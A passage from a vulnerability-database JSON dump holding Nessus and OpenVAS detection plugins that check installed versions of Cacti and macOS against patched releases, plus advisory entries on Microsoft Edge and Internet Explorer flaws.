reference:\"cacti-spine-debuginfo-0.8.8f-5.1\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"cacti-spine-debugsource-0.8.8f-5.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti-spine / cacti-spine-debuginfo / cacti-spine-debugsource / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-11-01T03:01:02", "bulletinFamily": "scanner", "description": "cacti was updated to fix the following vulnerabilities :\n\n - CVE-2015-8369: SQL injection in graph.php (boo#958863)\n\n - CVE-2015-8604: SQL injection in graphs_new.php\n (boo#960678)\n\n - CVE-2015-8377: SQL injection vulnerability in the\n host_new_graphs_save function in graphs_new.php\n (boo#958977)\n\n - CVE-2016-2313: Authentication using web authentication\n as a user not in the cacti database allows complete\n access (boo#965930)\n\nThe following non-security bugs were fixed :\n\nboo#965864: Poller Script Parser was broken (boo#965864)\n\ncacti-spine was updated to match the cacti version, fixing a number of\nupstream bugs.", "modified": "2019-11-02T00:00:00", "id": "OPENSUSE-2016-201.NASL", "href": "https://www.tenable.com/plugins/nessus/88734", "published": "2016-02-15T00:00:00", "title": "openSUSE Security Update : cacti (openSUSE-2016-201)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2016-201.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88734);\n script_version(\"$Revision: 2.2 $\");\n script_cvs_date(\"$Date: 2016/10/13 14:27:28 $\");\n\n script_cve_id(\"CVE-2015-8369\", \"CVE-2015-8377\", \"CVE-2015-8604\", \"CVE-2016-2313\");\n\n script_name(english:\"openSUSE Security Update : cacti (openSUSE-2016-201)\");\n script_summary(english:\"Check for the openSUSE-2016-201 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"cacti was updated to fix the following vulnerabilities :\n\n - CVE-2015-8369: SQL injection in graph.php (boo#958863)\n\n - CVE-2015-8604: SQL injection in graphs_new.php\n (boo#960678)\n\n - CVE-2015-8377: SQL injection vulnerability in the\n host_new_graphs_save function in graphs_new.php\n (boo#958977)\n\n - CVE-2016-2313: Authentication using web authentication\n as a user not in the cacti database allows complete\n access (boo#965930)\n\nThe following non-security bugs were fixed :\n\nboo#965864: Poller Script Parser was broken (boo#965864)\n\ncacti-spine was updated to match the cacti version, fixing a number of\nupstream bugs.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=958977\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=960678\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965864\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=965930\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected cacti package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:cacti\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.1\", reference:\"cacti-0.8.8f-17.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"cacti\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "openvas": [{"lastseen": "2019-05-24T10:31:58", "bulletinFamily": "scanner", "description": "This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.", "modified": "2019-05-22T00:00:00", "published": "2019-05-14T00:00:00", "id": "OPENVAS:1361412562310814888", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814888", "title": "Apple MacOSX Security Updates (HT210119) - 02", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814888\");\n script_version(\"2019-05-22T13:43:48+0000\");\n script_cve_id(\"CVE-2019-8603\", \"CVE-2019-8605\", \"CVE-2019-8604\", \"CVE-2019-8574\",\n \"CVE-2019-8591\", \"CVE-2019-8590\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-05-22 13:43:48 +0000 (Wed, 22 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-14 10:43:13 +0530 (Tue, 14 May 2019)\");\n script_name(\"Apple MacOSX Security Updates (HT210119) - 02\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Mac OS X\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exist due to\n\n - A validation issue with improper input sanitization.\n\n - A use after free issue with improper memory management.\n\n - A memory corruption issue with improper memory handling.\n\n - A type confusion issue with improper memory handling.\n\n - A logic issue with improper restrictions.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of this vulnerability\n will allow remote attackers to read restricted memory, execute arbitrary code with\n system privileges, cause system termination or write to the kernel memory.\");\n\n script_tag(name:\"affected\", value:\"Apple Mac OS X versions,\n 10.12.x through 10.12.6, 10.13.x through 10.13.6, 10.14.x through 10.14.4.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Mac OS X 10.12.6\n build 16G2016, or 10.13.6 build 17G7024 or 10.14.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT210119\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Mac OS X Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/osx_name\", \"ssh/login/osx_version\", re:\"ssh/login/osx_version=^10\\.1[2-4]\\.\");\n\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"ssh_func.inc\");\n\nosName = get_kb_item(\"ssh/login/osx_name\");\nif(!osName){\n exit(0);\n}\n\nosVer = get_kb_item(\"ssh/login/osx_version\");\nif(!osVer|| osVer !~ \"^10\\.1[2-4]\\.\"|| \"Mac OS X\" >!< osName){\n exit(0);\n}\n\nbuildVer = get_kb_item(\"ssh/login/osx_build\");\n\nif(osVer =~ \"^10\\.12\")\n{\n if(version_in_range(version:osVer, test_version:\"10.12\", test_version2:\"10.12.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.12.6\")\n {\n if(osVer == \"10.12.6\" && version_is_less(version:buildVer, test_version:\"16G2016\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nif(osVer =~ \"^10\\.13\")\n{\n if(version_in_range(version:osVer, test_version:\"10.13\", test_version2:\"10.13.5\")){\n fix = \"Upgrade to latest OS release and apply patch from vendor\";\n }\n\n else if(osVer == \"10.13.6\")\n {\n if(osVer == \"10.13.6\" && version_is_less(version:buildVer, test_version:\"17G7024\"))\n {\n fix = \"Apply patch from vendor\";\n osVer = osVer + \" Build \" + buildVer;\n }\n }\n}\n\nelse if(osVer == \"10.14.4\"){\n fix = \"10.14.5\";\n}\n\nif(fix)\n{\n report = report_fixed_ver(installed_version:osVer, fixed_version:fix);\n security_message(data:report);\n exit(0);\n}\nexit(99);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2019-05-29T18:35:38", "bulletinFamily": "scanner", "description": "This host is installed with Cacti and is\n prone to multiple sql injection and a security bypass vulnerabilities.", "modified": "2018-11-15T00:00:00", "published": "2016-04-26T00:00:00", "id": "OPENVAS:1361412562310807562", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807562", "title": "Cacti Multiple SQL Injection And Security Bypass Vulnerabilities-01 Apr16 (Linux)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cacti_mult_sql_inj_and_sec_bypass_vuln01_apr16_lin.nasl 12363 2018-11-15 09:51:15Z asteins $\n#\n# Cacti Multiple SQL Injection And Security Bypass Vulnerabilities-01 Apr16 (Linux)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807562\");\n script_version(\"$Revision: 12363 $\");\n script_cve_id(\"CVE-2015-8604\", \"CVE-2015-8369\", \"CVE-2015-8377\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-15 10:51:15 +0100 (Thu, 15 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-26 10:28:01 +0530 (Tue, 26 Apr 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n script_name(\"Cacti Multiple SQL Injection And Security Bypass Vulnerabilities-01 Apr16 (Linux)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Cacti and is\n prone to multiple sql injection and a security bypass vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - An insufficient validation of user supplied input via parameter 'cg_g' in the host_new_graphs function\ngraphs_new.php script.\n\n - An insufficient validation of user supplied input via parameter 'rra_id' in a properties action to graph.php\nscript.\n\n - An insufficient validation of user supplied input via parameter 'selected_graphs_array' in the\nhost_new_graphs_save function in graphs_new.php script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to execute arbitrary SQL\ncommands and to bypass intended access restrictions.\");\n\n script_tag(name:\"affected\", value:\"Cacti version 0.8.8f and earlier on Linux.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 0.8.8g or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://bugs.cacti.net/view.php?id=2656\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/135191\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2015/Dec/8\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cacti_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"cacti/installed\", \"Host/runs_unixoide\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.cacti.net\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!cacPort = get_app_port(cpe:CPE))\n exit(0);\n\nif(!cactiVer = get_app_version(cpe:CPE, port:cacPort))\n exit(0);\n\nif(version_is_less_equal(version:cactiVer, test_version:\"0.8.8f\")) {\n report = report_fixed_ver(installed_version:cactiVer, fixed_version:\"0.8.8g\");\n security_message(data:report, port:cacPort);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:25", "bulletinFamily": "scanner", "description": "This host is installed with Cacti and is\n prone to multiple sql injection and a security bypass vulnerabilities.", "modified": "2018-10-29T00:00:00", "published": "2016-04-26T00:00:00", "id": "OPENVAS:1361412562310807559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310807559", "title": "Cacti Multiple SQL Injection And Security Bypass Vulnerabilities-01 Apr16 (Windows)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_cacti_mult_sql_inj_and_sec_bypass_vuln01_apr16_win.nasl 12149 2018-10-29 10:48:30Z asteins $\n#\n# Cacti Multiple SQL Injection And Security Bypass Vulnerabilities-01 Apr16 (Windows)\n#\n# Authors:\n# Rinu Kuriakose <krinu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:cacti:cacti\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.807559\");\n script_version(\"$Revision: 12149 $\");\n script_cve_id(\"CVE-2015-8604\", \"CVE-2015-8369\", \"CVE-2015-8377\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-29 11:48:30 +0100 (Mon, 29 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-26 10:28:01 +0530 (Tue, 26 Apr 2016)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_name(\"Cacti Multiple SQL Injection And Security Bypass Vulnerabilities-01 Apr16 (Windows)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Cacti and is\n prone to multiple sql injection and a security bypass vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws are due to,\n\n - An insufficient validation of user supplied input via parameter 'cg_g' in the host_new_graphs function\ngraphs_new.php script.\n\n - An insufficient validation of user supplied input via parameter 'rra_id' in a properties action to graph.php\nscript.\n\n - An insufficient validation of user supplied input via parameter 'selected_graphs_array' in the\nhost_new_graphs_save function in graphs_new.php script.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attacker to execute arbitrary SQL\ncommands and to bypass intended access restrictions.\");\n\n script_tag(name:\"affected\", value:\"Cacti version 0.8.8f and earlier on Windows.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to version 0.8.8g or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://bugs.cacti.net/view.php?id=2656\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/135191\");\n script_xref(name:\"URL\", value:\"http://seclists.org/fulldisclosure/2015/Dec/8\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"cacti_detect.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"cacti/installed\", \"Host/runs_windows\");\n script_require_ports(\"Services/www\", 80);\n script_xref(name:\"URL\", value:\"http://www.cacti.net\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!cacPort = get_app_port(cpe:CPE))\n exit(0);\n\nif(!cactiVer = get_app_version(cpe:CPE, port:cacPort))\n exit(0);\n\nif (version_is_less_equal(version:cactiVer, test_version:\"0.8.8f\")) {\n report = report_fixed_ver(installed_version:cactiVer, fixed_version:\"0.8.8g\");\n security_message(data:report, port:cacPort);\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:49", "bulletinFamily": "scanner", "description": "Mageia Linux Local Security Checks mgasa-2016-0025", "modified": "2019-03-14T00:00:00", "published": "2016-01-21T00:00:00", "id": "OPENVAS:1361412562310131194", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310131194", "title": "Mageia Linux Local Check: mgasa-2016-0025", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: mgasa-2016-0025.nasl 14180 2019-03-14 12:29:16Z cfischer $\n#\n# Mageia Linux security check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2016 Eero Volotinen, http://www.solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.131194\");\n script_version(\"$Revision: 14180 $\");\n script_tag(name:\"creation_date\", value:\"2016-01-21 07:32:05 +0200 (Thu, 21 Jan 2016)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-14 13:29:16 +0100 (Thu, 14 Mar 2019) $\");\n script_name(\"Mageia Linux Local Check: mgasa-2016-0025\");\n script_tag(name:\"insight\", value:\"Several SQL injection vulnerabilities have been discovered in Cacti. Specially crafted input can be used by an attacker in the rra_id value of the graph.php script to execute arbitrary SQL commands on the database (CVE-2015-8369).\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://advisories.mageia.org/MGASA-2016-0025.html\");\n script_cve_id(\"CVE-2015-8369\", \"CVE-2015-8377\", \"CVE-2015-8604\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/mageia_linux\", \"ssh/login/release\", re:\"ssh/login/release=MAGEIA5\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"Mageia Linux Local Security Checks mgasa-2016-0025\");\n script_copyright(\"Eero Volotinen\");\n script_family(\"Mageia Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"MAGEIA5\")\n{\nif ((res = isrpmvuln(pkg:\"cacti\", rpm:\"cacti~0.8.8f~1.2.mga5\", rls:\"MAGEIA5\")) != NULL) {\n security_message(data:res);\n exit(0);\n}\nif (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2019-05-29T18:17:11", "bulletinFamily": "NVD", "description": "Microsoft Edge in Microsoft Windows 10 Gold, 1511, 1607, and 1703, and Windows Server 2016 allow an attacker to execute arbitrary code in the context of the current user when the JavaScript engine fails to render when handling objects in memory in Microsoft Edge, aka \"Scripting Engine Memory Corruption Vulnerability\". This CVE ID is unique from CVE-2017-8596, CVE-2017-8610, CVE-2017-8618, CVE-2017-8619, CVE-2017-8603, CVE-2017-8604, CVE-2017-8605, CVE-2017-8606, CVE-2017-8607, CVE-2017-8608, CVE-2017-8598 and CVE-2017-8609.", "modified": "2019-03-19T20:28:00", "id": "CVE-2017-8601", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8601", "published": "2017-07-11T21:29:00", "title": "CVE-2017-8601", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:15:26", "bulletinFamily": "info", "description": "### *Detect date*:\n07/11/2017\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Microsoft Edge and Microsoft Internet Explorer. Malicious users can exploit these vulnerabilities to bypass security restrictions, execute arbitrary code and spoof user interface.\n\n### *Affected products*:\nInternet Explorer 9 \nInternet Explorer 10 \nInternet Explorer 11 \nMicrosoft Edge \nMicrosoft Windows 10 \nMicrosoft Windows 7 Service Pack 1 \nMicrosoft Windows 8.1 \nMicrosoft Windows RT 8.1 \nMicrosoft Windows Server 2008 Service Pack 2 \nMicrosoft Windows Server 2008 R2 Service Pack 1 \nMicrosoft Windows Server 2012 \nMicrosoft Windows Server 2012 R2 \nMicrosoft Windows Server 2016\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2017-8618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8618>) \n[CVE-2017-8619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8619>) \n[CVE-2017-8599](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8599>) \n[CVE-2017-8598](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8598>) \n[CVE-2017-8617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8617>) \n[CVE-2017-8603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8603>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592>) \n[CVE-2017-8601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8601>) \n[CVE-2017-8602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8602>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8607>) \n[CVE-2017-8596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8596>) \n[CVE-2017-8595](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8595>) \n[CVE-2017-8604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8604>) \n[CVE-2017-8609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8609>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8608>) \n[CVE-2017-8605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8605>) \n[CVE-2017-8611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8611>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8606>) \n[CVE-2017-8594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8594>) \n[CVE-2017-8610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8610>) \n[CVE-2017-8592](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8592>) \n[CVE-2017-8594](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8594>) \n[CVE-2017-8595](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8595>) \n[CVE-2017-8596](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8596>) \n[CVE-2017-8598](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8598>) \n[CVE-2017-8599](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8599>) \n[CVE-2017-8601](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8601>) \n[CVE-2017-8602](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8602>) \n[CVE-2017-8603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8603>) \n[CVE-2017-8604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8604>) \n[CVE-2017-8605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8605>) \n[CVE-2017-8606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8606>) \n[CVE-2017-8607](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8607>) \n[CVE-2017-8608](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8608>) \n[CVE-2017-8609](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8609>) \n[CVE-2017-8610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8610>) \n[CVE-2017-8611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8611>) \n[CVE-2017-8617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8617>) \n[CVE-2017-8618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8618>) \n[CVE-2017-8619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8619>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Internet Explorer](<https://threats.kaspersky.com/en/product/Microsoft-Internet-Explorer/>)\n\n### *CVE-IDS*:\n[CVE-2017-8592](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8592>)4.3Critical \n[CVE-2017-8594](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8594>)7.6Critical \n[CVE-2017-8595](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8595>)7.6Critical \n[CVE-2017-8596](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8596>)7.6Critical 